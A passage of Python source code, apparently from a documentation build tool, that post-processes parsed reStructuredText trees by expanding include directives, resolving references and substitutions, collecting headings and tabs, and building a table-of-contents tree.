self.diagnostics[fileid_stack.current].append(MissingOption(line))\n return\n program_target = next(\n self.pending_program.get_child_of_type(n.TargetIdentifier)\n )\n program_name_node = program_target.children[0]\n assert isinstance(program_name_node, n.Text)\n program_name = program_name_node.value\n new_identifiers: List[n.Node] = []\n for child in node.get_child_of_type(n.TargetIdentifier):\n child_ids = child.ids\n child_ids.extend(\n [f\"{program_name}.{child_id}\" for child_id in child_ids]\n )\n\n text_node = child.children[0]\n assert isinstance(text_node, n.Text)\n value = text_node.value\n text_node.value = f\"{program_name} {value}\"\n\n node.children.extend(new_identifiers)\n\n\nclass IncludeHandler:\n \"\"\"Iterate over all pages to find include directives. When found, replace their\n `children` property with the contents of the include file.\n Because the include contents are added to the tree on which the event parser is\n running, they will automatically be parsed and have their includes expanded, too.\"\"\"\n\n def __init__(\n self,\n diagnostics: Dict[FileId, List[Diagnostic]],\n slug_fileid_mapping: Dict[str, FileId],\n pages: Dict[FileId, Page],\n ) -> None:\n self.diagnostics = diagnostics\n self.slug_fileid_mapping = slug_fileid_mapping\n self.pages = pages\n\n def reset(self, fileid_stack: FileIdStack) -> None:\n pass\n\n @staticmethod\n def is_bound(node: n.Node, search_text: Optional[str]) -> bool:\n \"\"\"Helper function to determine if the given node contains specified start-after or end-before text.\n\n Note: For now, we are only splicing included files based on Comments and TargetIdentifier nodes.\n Comments have Text nodes as children; Labels have TargetIdentifiers as children.\"\"\"\n if isinstance(node, n.Comment):\n if node.children and isinstance(node.children[0], n.Text):\n comment_text = node.children[0].get_text()\n return search_text == comment_text\n elif isinstance(node, n.Target):\n # TODO: get_child_of_type\n if node.domain == \"std\" and node.name == \"label\":\n if node.children and isinstance(node.children[0], n.TargetIdentifier):\n target_identifier = node.children[0]\n if target_identifier.ids:\n return search_text in target_identifier.ids\n return False\n\n def bound_included_AST(\n self,\n nodes: MutableSequence[n.Node],\n start_after_text: Optional[str],\n end_before_text: Optional[str],\n ) -> Tuple[MutableSequence[n.Node], bool, bool]:\n \"\"\"Given an AST in the form of nodes, return a subgraph of that AST by removing nodes 'outside' of\n the bound formed by the nodes containing the start_after_text or end_before_text. 
In in-order traversal,\n a node is considered 'outside' the subgraph if it precedes and is not any ancestor of the start-after node,\n or if it succeeds and is not any ancestor of the end-before node.\"\"\"\n\n start_index, end_index = 0, len(nodes)\n any_start, any_end = False, False\n\n # For any given node: if the start_after node is within this node's subtree, do not include any\n # preceding siblings of this node in the resulting AST; if the end_before node is within this\n # node's subtree, then do not include any succeeding siblings of this node.\n for i, node in enumerate(nodes):\n has_start, has_end = False, False\n # Determine if this node itself (not a child node) contains a bound\n is_start = IncludeHandler.is_bound(node, start_after_text)\n is_end = IncludeHandler.is_bound(node, end_before_text)\n # Recursively search the child nodes for bounds\n if isinstance(node, n.Parent):\n children, has_start, has_end = self.bound_included_AST(\n node.children, start_after_text, end_before_text\n )\n node.children = children\n if is_start or has_start:\n any_start = True\n start_index = i\n if is_end or has_end:\n any_end = True\n end_index = i\n if start_index > end_index:\n raise Exception(\"start-after text should precede end-before text\")\n # Remove sibling nodes preceding and succeeding the nodes containing the bounds in their subtrees\n return nodes[start_index : end_index + 1], any_start, any_end\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n def get_include_argument(node: n.Directive) -> str:\n \"\"\"Get filename of include\"\"\"\n argument_list = node.argument\n assert len(argument_list) > 0\n return argument_list[0].value\n\n if not isinstance(node, n.Directive) or not node.name == \"include\":\n return\n\n argument = get_include_argument(node)\n include_slug = clean_slug(argument)\n include_fileid = self.slug_fileid_mapping.get(include_slug)\n # Some `include` FileIds in the mapping include file extensions (.yaml) and others do not\n # This will likely be resolved by DOCSP-7159 https://jira.mongodb.org/browse/DOCSP-7159\n if include_fileid is None:\n include_slug = argument.strip(\"/\")\n include_fileid = self.slug_fileid_mapping.get(include_slug)\n\n # End if we can't find a file\n if include_fileid is None:\n return\n\n include_page = self.pages.get(include_fileid)\n assert include_page is not None\n ast = include_page.ast\n assert isinstance(ast, n.Parent)\n deep_copy_children: MutableSequence[n.Node] = [util.fast_deep_copy(ast)]\n\n # TODO: Move subgraphing implementation into parse layer, where we can\n # ideally take subgraph of the raw RST\n start_after_text = node.options.get(\"start-after\")\n end_before_text = node.options.get(\"end-before\")\n\n if start_after_text or end_before_text:\n line = node.span[0]\n any_start, any_end = False, False\n try:\n # Returns a subgraph of the AST based on text bounds\n deep_copy_children, any_start, any_end = self.bound_included_AST(\n deep_copy_children, start_after_text, end_before_text\n )\n except Exception as e:\n self.diagnostics[fileid_stack.current].append(\n InvalidInclude(str(e), line)\n )\n # Confirm that we found all specified text (with helpful diagnostic )message if not)\n msg = \"Please be sure your text is a comment or label. Search is case-sensitive.\"\n if start_after_text and not any_start:\n self.diagnostics[fileid_stack.current].append(\n InvalidInclude(\n f\"Could not find specified start-after text: '{start_after_text}'. 
{msg}\",\n line,\n )\n )\n if end_before_text and not any_end:\n self.diagnostics[fileid_stack.current].append(\n InvalidInclude(\n f\"Could not find specified end-before text: '{end_before_text}'. {msg}\",\n line,\n )\n )\n\n node.children = deep_copy_children\n\n\nclass NamedReferenceHandler:\n \"\"\"Identify non-anonymous hyperlinks (i.e. those defined with a single underscore) and save them according to {name: url}.\n Attach the associated URL to any uses of this named reference.\n \"\"\"\n\n def __init__(self, diagnostics: Dict[FileId, List[Diagnostic]]) -> None:\n self.named_references: Dict[str, str] = {}\n self.diagnostics = diagnostics\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if not isinstance(node, n.NamedReference):\n return\n\n self.named_references[node.refname] = node.refuri\n\n def populate(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if not isinstance(node, n.Reference):\n return\n\n if node.refuri:\n # Node is already populated with url; nothing to do\n return\n\n refuri = self.named_references.get(node.refname)\n if refuri is None:\n line = node.span[0]\n self.diagnostics[fileid_stack.current].append(\n TargetNotFound(\"extlink\", node.refname, line)\n )\n return\n\n node.refuri = refuri\n\n\nclass ContentsHandler:\n \"\"\"Identify all headings on a given page. If a contents directive appears on the page, save list of headings as a page-level option.\"\"\"\n\n class HeadingData(NamedTuple):\n depth: int\n id: str\n title: Sequence[n.InlineNode]\n\n def __init__(self, diagnostics: Dict[FileId, List[Diagnostic]]) -> None:\n self.contents_depth = sys.maxsize\n self.current_depth = 0\n self.has_contents_directive = False\n self.headings: List[ContentsHandler.HeadingData] = []\n self.diagnostics = diagnostics\n\n def reset(self, fileid_stack: FileIdStack, page: Page) -> None:\n self.contents_depth = sys.maxsize\n self.current_depth = 0\n self.has_contents_directive = False\n self.headings = []\n\n def finalize_headings(self, fileid_stack: FileIdStack, page: Page) -> None:\n if not self.has_contents_directive:\n return\n\n if isinstance(page.ast, n.Root):\n heading_list = [\n {\n \"depth\": h.depth,\n \"id\": h.id,\n \"title\": [node.serialize() for node in h.title],\n }\n for h in self.headings\n if h.depth - 1 <= self.contents_depth\n ]\n if heading_list:\n page.ast.options[\"headings\"] = heading_list\n\n def enter_section(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if isinstance(node, n.Section):\n self.current_depth += 1\n\n def exit_section(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if isinstance(node, n.Section):\n self.current_depth -= 1\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if isinstance(node, n.Directive) and node.name == \"contents\":\n if self.has_contents_directive:\n self.diagnostics[fileid_stack.current].append(\n DuplicateDirective(node.name, node.start[0])\n )\n return\n\n self.has_contents_directive = True\n self.contents_depth = int(node.options.get(\"depth\", sys.maxsize))\n return\n\n if self.current_depth - 1 > self.contents_depth:\n return\n\n # Omit title headings (depth = 1) from heading list\n if isinstance(node, n.Heading) and self.current_depth > 1:\n self.headings.append(\n ContentsHandler.HeadingData(self.current_depth, node.id, node.children)\n )\n\n\nclass TabsSelectorHandler:\n def __init__(self, diagnostics: Dict[FileId, List[Diagnostic]]) -> None:\n self.selectors: Dict[str, List[Dict[str, MutableSequence[n.Text]]]] = {}\n 
self.diagnostics = diagnostics\n\n def reset(self, fileid_stack: FileIdStack, page: Page) -> None:\n self.selectors = {}\n\n def finalize_tabsets(self, fileid_stack: FileIdStack, page: Page) -> None:\n if len(self.selectors) == 0:\n return\n\n for tabset_name, tabsets in self.selectors.items():\n if len(tabsets) == 0:\n # Warn if tabs-selector is used without corresponding tabset\n self.diagnostics[fileid_stack.current].append(ExpectedTabs(0))\n return\n if not all(len(t) == len(tabsets[0]) for t in tabsets):\n # If all tabsets are not the same length, identify tabs that do not appear in every tabset\n tabset_sets = [set(t.keys()) for t in tabsets]\n union = set.union(*tabset_sets)\n intersection = set.intersection(*tabset_sets)\n error_tabs = union - intersection\n self.diagnostics[fileid_stack.current].append(MissingTab(error_tabs, 0))\n\n if isinstance(page.ast, n.Root):\n if not page.ast.options.get(\"selectors\"):\n page.ast.options[\"selectors\"] = {}\n\n assert isinstance(page.ast.options[\"selectors\"], Dict)\n page.ast.options[\"selectors\"][tabset_name] = {\n tabid: [node.serialize() for node in title]\n for tabid, title in tabsets[0].items()\n }\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if not isinstance(node, n.Directive):\n return\n\n if node.name == \"tabs-pillstrip\" or node.name == \"tabs-selector\":\n if len(node.argument) == 0:\n return\n\n tabset_name: str = node.argument[0].get_text()\n # Handle naming discrepancy between .. tabs-pillstrip:: languages and .. tabs-drivers::\n if tabset_name == \"languages\":\n tabset_name = \"drivers\"\n\n # Avoid overwriting previously seen tabsets if another tabs-pillstrip directive is encountered\n if tabset_name in self.selectors:\n self.diagnostics[fileid_stack.current].append(\n DuplicateDirective(node.name, node.start[0])\n )\n return\n\n self.selectors[tabset_name] = []\n return\n\n if len(self.selectors) == 0 or node.name != \"tabs\":\n return\n\n tabset_name = node.options.get(\"tabset\", \"\")\n if tabset_name in self.selectors:\n tabs = {\n tab.options[\"tabid\"]: tab.argument\n for tab in node.get_child_of_type(n.Directive)\n if tab.name == \"tab\" and \"tabid\" in tab.options\n }\n self.selectors[tabset_name].append(tabs)\n\n\nclass TargetHandler:\n def __init__(self, targets: TargetDatabase) -> None:\n self.target_counter: typing.Counter[str] = collections.Counter()\n self.targets = targets\n\n def reset(self, fileid_stack: FileIdStack, page: Page) -> None:\n self.target_counter.clear()\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if not isinstance(node, n.Target):\n return\n\n # Frankly, this is silly. We just pick the longest identifier. 
This is arbitrary,\n # and we can consider this behavior implementation-defined to be changed later if needed.\n # It just needs to be something consistent.\n identifiers = list(node.get_child_of_type(n.TargetIdentifier))\n candidates = [\n max(identifier.ids, key=len) for identifier in identifiers if identifier.ids\n ]\n\n if not candidates:\n return\n\n chosen_id = max(candidates, key=len)\n chosen_html_id = f\"{node.domain}-{node.name}-{util.make_html5_id(chosen_id)}\"\n\n # Disambiguate duplicate IDs, should they occur.\n counter = self.target_counter[chosen_html_id]\n if counter > 0:\n chosen_html_id += f\"-{counter}\"\n self.target_counter[chosen_html_id] += 1\n node.html_id = chosen_html_id\n\n for target_node in identifiers:\n if not target_node.children:\n title: List[n.InlineNode] = []\n else:\n title = list(target_node.children)\n\n target_ids = target_node.ids\n self.targets.define_local_target(\n node.domain,\n node.name,\n target_ids,\n fileid_stack.root,\n title,\n chosen_html_id,\n )\n\n\nclass HeadingHandler:\n \"\"\"Construct a slug-title mapping of all pages in property, and rewrite\n heading IDs so as to be unique.\"\"\"\n\n def __init__(self, targets: TargetDatabase) -> None:\n self.heading_counter: typing.Counter[str] = collections.Counter()\n self.targets = targets\n self.slug_title_mapping: Dict[str, Sequence[n.InlineNode]] = {}\n\n def reset(self, fileid_stack: FileIdStack, page: Page) -> None:\n self.heading_counter.clear()\n\n def get_title(self, slug: str) -> Optional[Sequence[n.InlineNode]]:\n return self.slug_title_mapping.get(slug)\n\n def __contains__(self, slug: str) -> bool:\n return slug in self.slug_title_mapping\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if not isinstance(node, n.Heading):\n return\n\n counter = self.heading_counter[node.id]\n self.heading_counter[node.id] += 1\n if counter > 0:\n node.id += f\"-{counter}\"\n\n slug = fileid_stack.root.without_known_suffix\n\n # Save the first heading we encounter to the slug title mapping\n if slug not in self.slug_title_mapping:\n self.targets.define_local_target(\n \"std\",\n \"doc\",\n (slug,),\n fileid_stack.root,\n node.children,\n util.make_html5_id(node.id),\n )\n self.slug_title_mapping[slug] = node.children\n self.targets.define_local_target(\n \"std\",\n \"doc\",\n (fileid_stack.root.without_known_suffix,),\n fileid_stack.root,\n node.children,\n util.make_html5_id(node.id),\n )\n\n\nclass IAHandler:\n \"\"\"Identify IA directive on a page and save a list of its entries as a page-level option.\"\"\"\n\n class IAData(NamedTuple):\n title: Sequence[n.InlineNode]\n url: Optional[str]\n slug: Optional[str]\n project_name: Optional[str]\n primary: Optional[bool]\n\n def serialize(self) -> n.SerializedNode:\n result: n.SerializedNode = {\n \"title\": [node.serialize() for node in self.title],\n }\n\n if self.project_name:\n result[\"project_name\"] = self.project_name\n if self.slug:\n result[\"slug\"] = self.slug\n if self.url:\n result[\"url\"] = self.url\n if self.primary is not None:\n result[\"primary\"] = self.primary\n\n return result\n\n def __init__(\n self,\n diagnostics: Dict[FileId, List[Diagnostic]],\n heading_handler: HeadingHandler,\n ) -> None:\n self.ia: List[IAHandler.IAData] = []\n self.diagnostics = diagnostics\n self.heading_handler = heading_handler\n\n def reset(self, fileid_stack: FileIdStack, page: Page) -> None:\n self.ia = []\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if (\n not isinstance(node, 
n.Directive)\n or not node.name == \"ia\"\n or not node.domain == \"\"\n ):\n return\n\n if self.ia:\n self.diagnostics[fileid_stack.current].append(\n DuplicateDirective(node.name, node.start[0])\n )\n return\n\n for entry in node.get_child_of_type(n.Directive):\n if entry.name != \"entry\":\n line = node.span[0]\n self.diagnostics[fileid_stack.current].append(\n InvalidChild(entry.name, \"ia\", \"entry\", line)\n )\n continue\n\n if not entry.options.get(\"url\"):\n self.diagnostics[fileid_stack.current].append(\n InvalidIAEntry(\n \"IA entry directives must include the :url: option\",\n node.span[0],\n )\n )\n continue\n\n parsed = urllib.parse.urlparse(entry.options.get(\"url\"))\n if parsed.scheme:\n url = entry.options.get(\"url\")\n slug = None\n else:\n url = None\n slug = entry.options.get(\"url\")\n\n if slug and not self.heading_handler.get_title(clean_slug(slug)):\n self.diagnostics[fileid_stack.current].append(\n MissingTocTreeEntry(slug, node.span[0])\n )\n continue\n\n title: Sequence[n.InlineNode] = []\n if len(entry.argument) > 0:\n title = entry.argument\n elif slug:\n title = self.heading_handler.get_title(clean_slug(slug)) or []\n\n project_name = entry.options.get(\"project-name\")\n if project_name and not url:\n self.diagnostics[fileid_stack.current].append(\n InvalidIAEntry(\n \"IA entry directives with :project-name: option must include :url: option\",\n node.span[0],\n )\n )\n continue\n\n if url and not title:\n self.diagnostics[fileid_stack.current].append(\n InvalidIAEntry(\n \"IA entries to external URLs must include titles\",\n node.span[0],\n )\n )\n continue\n\n self.ia.append(\n IAHandler.IAData(\n title,\n url,\n slug,\n project_name,\n bool(entry.options.get(\"primary\", False)) if project_name else None,\n )\n )\n\n def finalize_ia(self, fileid_stack: FileIdStack, page: Page) -> None:\n if not self.ia:\n return\n\n if isinstance(page.ast, n.Root):\n page.ast.options[\"ia\"] = [entry.serialize() for entry in self.ia]\n\n\nclass Postprocessor:\n \"\"\"Handles all postprocessing operations on parsed AST files.\n\n The only method that should be called on an instance of Postprocessor is run(). 
This method\n handles calling all other methods and ensures that parse operations are run in the correct order.\"\"\"\n\n def __init__(self, project_config: ProjectConfig, targets: TargetDatabase) -> None:\n self.project_config = project_config\n self.toctree: Dict[str, SerializableType] = {}\n self.pages: Dict[FileId, Page] = {}\n self.pending_targets: List[n.Node] = []\n self.targets = targets\n self.substitution_definitions: Dict[str, MutableSequence[n.InlineNode]] = {}\n self.unreplaced_nodes: List[Tuple[n.SubstitutionReference, int]] = []\n self.seen_definitions: Optional[Set[str]] = None\n self.toc_landing_pages = [\n clean_slug(slug) for slug in project_config.toc_landing_pages\n ]\n self.pending_program: Optional[SerializableType] = None\n\n def run(\n self, pages: Dict[FileId, Page]\n ) -> Tuple[Dict[str, SerializableType], Dict[FileId, List[Diagnostic]]]:\n \"\"\"Run all postprocessing operations and return a dictionary containing the metadata document to be saved.\"\"\"\n if not pages:\n return {}, {}\n\n self.pages = pages\n self.build_slug_fileid_mapping()\n self.diagnostics: Dict[FileId, List[Diagnostic]] = defaultdict(list)\n\n include_handler = IncludeHandler(\n self.diagnostics, self.slug_fileid_mapping, self.pages\n )\n self.run_event_parser([(EventParser.OBJECT_START_EVENT, include_handler)])\n\n self.handle_substitutions()\n\n option_handler = ProgramOptionHandler(self.diagnostics)\n tabs_selector_handler = TabsSelectorHandler(self.diagnostics)\n contents_handler = ContentsHandler(self.diagnostics)\n self.heading_handler = HeadingHandler(self.targets)\n\n self.run_event_parser(\n [\n (EventParser.OBJECT_START_EVENT, self.heading_handler),\n (EventParser.OBJECT_START_EVENT, self.add_titles_to_label_targets),\n (\n EventParser.OBJECT_START_EVENT,\n option_handler,\n ),\n (EventParser.OBJECT_START_EVENT, tabs_selector_handler),\n (EventParser.OBJECT_START_EVENT, contents_handler.enter_section),\n (EventParser.OBJECT_START_EVENT, contents_handler),\n (EventParser.OBJECT_END_EVENT, contents_handler.exit_section),\n ],\n [\n (EventParser.PAGE_START_EVENT, option_handler.reset),\n (EventParser.PAGE_START_EVENT, tabs_selector_handler.reset),\n (EventParser.PAGE_START_EVENT, contents_handler.reset),\n (EventParser.PAGE_END_EVENT, contents_handler.finalize_headings),\n (EventParser.PAGE_END_EVENT, tabs_selector_handler.finalize_tabsets),\n (EventParser.PAGE_END_EVENT, self.heading_handler.reset),\n ],\n )\n\n target_handler = TargetHandler(self.targets)\n named_reference_handler = NamedReferenceHandler(self.diagnostics)\n ia_handler = IAHandler(self.diagnostics, self.heading_handler)\n self.run_event_parser(\n [\n (EventParser.OBJECT_START_EVENT, target_handler),\n (EventParser.OBJECT_START_EVENT, named_reference_handler),\n (EventParser.OBJECT_START_EVENT, ia_handler),\n ],\n [\n (EventParser.PAGE_START_EVENT, target_handler.reset),\n (EventParser.PAGE_START_EVENT, ia_handler.reset),\n (EventParser.PAGE_END_EVENT, ia_handler.finalize_ia),\n ],\n )\n self.run_event_parser(\n [\n (EventParser.OBJECT_START_EVENT, self.handle_refs),\n (EventParser.OBJECT_START_EVENT, named_reference_handler.populate),\n ]\n )\n document = self.generate_metadata()\n\n return document, self.diagnostics\n\n def generate_metadata(self) -> n.SerializedNode:\n document: Dict[str, SerializableType] = {}\n document[\"title\"] = self.project_config.title\n if self.project_config.deprecated_versions:\n document[\"deprecated_versions\"] = self.project_config.deprecated_versions\n # Update metadata document 
with key-value pairs defined in event parser\n document[\"slugToTitle\"] = {\n k: [node.serialize() for node in v]\n for k, v in self.heading_handler.slug_title_mapping.items()\n }\n # Run postprocessing operations related to toctree and append to metadata document.\n # If iatree is found, use it to generate breadcrumbs and parent paths and save it to metadata as well.\n iatree = self.build_iatree()\n toctree = self.build_toctree()\n if iatree and toctree.get(\"children\"):\n self.diagnostics[FileId(\"index.txt\")].append(InvalidTocTree(0))\n\n tree = iatree or toctree\n document.update(\n {\n \"toctree\": toctree,\n \"toctreeOrder\": self.toctree_order(tree),\n \"parentPaths\": self.breadcrumbs(tree),\n }\n )\n\n if iatree:\n document[\"iatree\"] = iatree\n\n return document\n\n def _get_page_from_slug(self, current_page: Page, slug: str) -> Optional[Page]:\n relative, _ = util.reroot_path(\n FileId(slug), current_page.source_path, self.project_config.source_path\n )\n\n try:\n fileid_with_ext = self.slug_fileid_mapping[relative.as_posix()]\n except KeyError:\n return None\n return self.pages.get(fileid_with_ext)\n\n def run_event_parser(\n self,\n node_listeners: Iterable[Tuple[str, Callable[[FileIdStack, n.Node], None]]],\n page_listeners: Iterable[Tuple[str, Callable[[FileIdStack, Page], None]]] = (),\n ) -> None:\n event_parser = EventParser()\n for event, node_listener in node_listeners:\n event_parser.add_event_listener(event, node_listener)\n\n for event, page_listener in page_listeners:\n event_parser.add_event_listener(event, page_listener)\n\n event_parser.consume(\n (k, v) for k, v in self.pages.items() if k.suffix == \".txt\"\n )\n\n def _attach_doc_title(self, fileid_stack: FileIdStack, node: n.RefRole) -> None:\n target_fileid = None if node.fileid is None else node.fileid[0]\n if not target_fileid:\n line = node.span[0]\n self.diagnostics[fileid_stack.current].append(\n ExpectedPathArg(node.name, line)\n )\n return\n\n relative, _ = util.reroot_path(\n FileId(target_fileid), fileid_stack.root, self.project_config.source_path\n )\n slug = clean_slug(relative.as_posix())\n title = self.heading_handler.get_title(slug)\n\n if not title:\n line = node.span[0]\n self.diagnostics[fileid_stack.current].append(\n UnnamedPage(target_fileid, line)\n )\n return\n\n node.children = [deepcopy(node) for node in title]\n\n def handle_refs(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n \"\"\"When a node of type ref_role is encountered, ensure that it references a valid target.\n\n If so, append the full URL to the AST node. 
If not, throw an error.\n \"\"\"\n if not isinstance(node, n.RefRole):\n return\n key = f\"{node.domain}:{node.name}\"\n\n if key == \"std:doc\":\n if not node.children:\n # If title is not explicitly given, search slug-title mapping for the page's title\n self._attach_doc_title(fileid_stack, node)\n return\n\n key += f\":{node.target}\"\n\n # Add title and link target to AST\n target_candidates = self.targets[key]\n if not target_candidates:\n # insert title and raise diagnostic\n line = node.span[0]\n target_dict = specparser.SPEC.rstobject\n target_key = f\"{node.domain}:{node.name}\"\n title = node.target\n # abstract title from node's target to insert into new text node\n if target_key in target_dict and target_dict[target_key].prefix:\n title = title.replace(f\"{target_dict[target_key].prefix}.\", \"\")\n text_node = n.Text((line,), title)\n injection_candidate = get_title_injection_candidate(node)\n\n if injection_candidate is not None:\n injection_candidate.children = [text_node]\n\n self.diagnostics[fileid_stack.current].append(\n TargetNotFound(node.name, node.target, line)\n )\n return\n\n if len(target_candidates) > 1:\n # Try to prune down the options\n target_candidates = self.attempt_disambugation(\n fileid_stack.root, target_candidates\n )\n\n if len(target_candidates) > 1:\n line = node.span[0]\n candidate_descriptions = []\n for candidate in target_candidates:\n if isinstance(candidate, TargetDatabase.InternalResult):\n candidate_descriptions.append(candidate.result[0])\n else:\n candidate_descriptions.append(candidate.url)\n\n self.diagnostics[fileid_stack.current].append(\n AmbiguousTarget(node.name, node.target, candidate_descriptions, line)\n )\n\n # Choose the most recently-defined target candidate if it is ambiguous\n result = target_candidates[-1]\n node.target = result.canonical_target_name\n if isinstance(result, TargetDatabase.InternalResult):\n node.fileid = result.result\n else:\n node.url = result.url\n injection_candidate = get_title_injection_candidate(node)\n # If there is no explicit title given, use the target's title\n if injection_candidate is not None:\n cloned_title_nodes: MutableSequence[n.Node] = list(\n deepcopy(node) for node in result.title\n )\n for title_node in cloned_title_nodes:\n deep_copy_position(node, title_node)\n\n # Label abbreviation is underspecified. 
Good luck!\n if \"~\" in node.flag and cloned_title_nodes:\n node_to_abbreviate = cloned_title_nodes[0]\n if isinstance(node_to_abbreviate, n.Text):\n index = node_to_abbreviate.value.rfind(\".\")\n new_value = node_to_abbreviate.value[index + 1 :].strip()\n\n if new_value:\n node_to_abbreviate.value = new_value\n\n injection_candidate.children = cloned_title_nodes\n\n def attempt_disambugation(\n self, fileid: FileId, candidates: Sequence[TargetDatabase.Result]\n ) -> Sequence[TargetDatabase.Result]:\n \"\"\"Given multiple possible targets we can link to, attempt to narrow down the\n list to one probably-intended target under a set of narrow circumstances.\"\"\"\n\n # If there is a single local candidate, choose that.\n local_candidates: List[TargetDatabase.InternalResult] = [\n candidate\n for candidate in candidates\n if isinstance(candidate, TargetDatabase.InternalResult)\n ]\n if len(local_candidates) == 1:\n return [local_candidates[0]]\n\n # If there is a target defined in the current context, use that.\n current_fileid_candidates = [\n candidate\n for candidate in local_candidates\n if candidate.result[0] == fileid.without_known_suffix\n ]\n if len(current_fileid_candidates) == 1:\n return [current_fileid_candidates[0]]\n\n return candidates\n\n def handle_substitutions(self) -> None:\n \"\"\"Find and replace substitutions throughout project\"\"\"\n self.run_event_parser(\n [\n (EventParser.OBJECT_START_EVENT, self.replace_substitutions),\n (EventParser.OBJECT_END_EVENT, self.reset_seen_definitions),\n ],\n [(EventParser.PAGE_END_EVENT, self.finalize_substitutions)],\n )\n\n def replace_substitutions(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n \"\"\"When a substitution is defined, add it to the page's index.\n\n When a substitution is referenced, populate its children if possible.\n If not, save this node to be populated at the end of the page.\n \"\"\"\n\n try:\n line = node.span[0]\n if isinstance(node, n.SubstitutionDefinition):\n self.substitution_definitions[node.name] = node.children\n self.seen_definitions = set()\n elif isinstance(node, n.SubstitutionReference):\n # Get substitution from page. If not found, attempt to source from snooty.toml. 
Otherwise, save substitution to be populated at the end of page\n substitution = self.substitution_definitions.get(\n node.name\n ) or self.project_config.substitution_nodes.get(node.name)\n\n if (\n self.seen_definitions is not None\n and node.name in self.seen_definitions\n ):\n # Catch circular substitution\n del self.substitution_definitions[node.name]\n node.children = []\n self.diagnostics[fileid_stack.current].append(\n SubstitutionRefError(\n f'Circular substitution definition referenced: \"{node.name}\"',\n line,\n )\n )\n elif substitution is not None:\n node.children = substitution\n else:\n # Save node in order to populate it at the end of the page\n self.unreplaced_nodes.append((node, line))\n\n if self.seen_definitions is not None:\n self.seen_definitions.add(node.name)\n except KeyError:\n # If node does not contain \"name\" field, it is a duplicate substitution definition.\n # An error has already been thrown for this on parse, so pass.\n pass\n\n def finalize_substitutions(self, fileid_stack: FileIdStack, page: Page) -> None:\n \"\"\"Attempt to populate any yet-unresolved substitutions (substitutions defined after usage) .\n\n Clear definitions and unreplaced nodes for the next page.\n \"\"\"\n for node, line in self.unreplaced_nodes:\n substitution = self.substitution_definitions.get(node.name)\n if substitution is not None:\n node.children = substitution\n else:\n self.diagnostics[fileid_stack.current].append(\n SubstitutionRefError(\n f'Substitution reference could not be replaced: \"|{node.name}|\"',\n line,\n )\n )\n\n self.substitution_definitions = {}\n self.unreplaced_nodes = []\n\n def reset_seen_definitions(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if isinstance(node, n.SubstitutionDefinition):\n self.seen_definitions = None\n\n def add_titles_to_label_targets(\n self, fileid_stack: FileIdStack, node: n.Node\n ) -> None:\n if not isinstance(node, (n.Target, n.Section, n.TargetIdentifier)):\n self.pending_targets = []\n\n if isinstance(node, n.Target) and node.domain == \"std\" and node.name == \"label\":\n self.pending_targets.extend(node.children)\n elif isinstance(node, n.Section):\n for target in self.pending_targets:\n heading = next(node.get_child_of_type(n.Heading), None)\n if heading is not None:\n assert isinstance(target, n.Parent)\n target.children = heading.children\n self.pending_targets = []\n\n def build_slug_fileid_mapping(self) -> None:\n \"\"\"Construct a {slug: fileid} mapping so that we can retrieve the full file name\n given a slug. We cannot use the with_suffix method since the type of the slug\n in find_toctree_nodes(...) 
is string rather than FileId.\"\"\"\n fileid_dict: Dict[str, FileId] = {}\n for fileid in self.pages:\n slug = fileid.without_known_suffix\n fileid_dict[slug] = fileid\n self.slug_fileid_mapping = fileid_dict\n\n def build_iatree(self) -> Dict[str, SerializableType]:\n starting_page = self.pages.get(FileId(\"index.txt\"))\n\n if not starting_page:\n return {}\n if not isinstance(starting_page.ast, n.Root):\n return {}\n if \"ia\" not in starting_page.ast.options:\n return {}\n\n title: Sequence[n.InlineNode] = self.heading_handler.get_title(\"index\") or [\n n.Text((0,), self.project_config.title)\n ]\n root: Dict[str, SerializableType] = {\n \"title\": [node.serialize() for node in title],\n \"slug\": \"/\",\n \"children\": [],\n }\n self.iterate_ia(starting_page, root)\n return root\n\n def iterate_ia(self, page: Page, result: Dict[str, SerializableType]) -> None:\n \"\"\"Construct a tree of similar structure to toctree. Starting from root, identify ia object on page and recurse on its entries to build a tree. Includes all potential properties of an entry including title, URI, project name, and primary status.\"\"\"\n if not isinstance(page.ast, n.Root):\n return\n\n ia = page.ast.options.get(\"ia\")\n if not isinstance(ia, List):\n return\n for entry in ia:\n curr: Dict[str, SerializableType] = {**entry, \"children\": []}\n if isinstance(result[\"children\"], List):\n result[\"children\"].append(curr)\n\n slug = curr.get(\"slug\")\n if isinstance(slug, str):\n child = self._get_page_from_slug(page, slug)\n if child:\n self.iterate_ia(child, curr)\n\n def build_toctree(self) -> Dict[str, SerializableType]:\n \"\"\"Build property toctree\"\"\"\n\n # The toctree must begin at either `contents.txt` or `index.txt`.\n # Generally, repositories will have one or the other; but, if a repo has both,\n # the starting point will be `contents.txt`.\n candidates = (FileId(\"contents.txt\"), FileId(\"index.txt\"))\n starting_fileid = next(\n (candidate for candidate in candidates if candidate in self.pages), None\n )\n if starting_fileid is None:\n return {}\n\n # Build the toctree\n root: Dict[str, SerializableType] = {\n \"title\": [n.Text((0,), self.project_config.title).serialize()],\n \"slug\": \"/\",\n \"children\": [],\n }\n ast = self.pages[starting_fileid].ast\n\n self.find_toctree_nodes(starting_fileid, ast, root, {starting_fileid})\n\n self.toctree = root\n return root\n\n def find_toctree_nodes(\n self,\n fileid: FileId,\n ast: n.Node,\n node: Dict[str, Any],\n visited_file_ids: Set[FileId] = set(),\n ) -> None:\n \"\"\"Iterate over AST to find toctree directives and construct their nodes for the unified toctree\"\"\"\n\n # Base case: stop iterating over AST\n if not isinstance(ast, n.Parent):\n return\n\n if isinstance(ast, n.TocTreeDirective):\n # Recursively build the tree for each toctree node in this entries list\n for entry in ast.entries:\n toctree_node: Dict[str, object] = {}\n if entry.url:\n toctree_node = {\n \"title\": [n.Text((0,), entry.title).serialize()]\n if entry.title\n else None,\n \"url\": 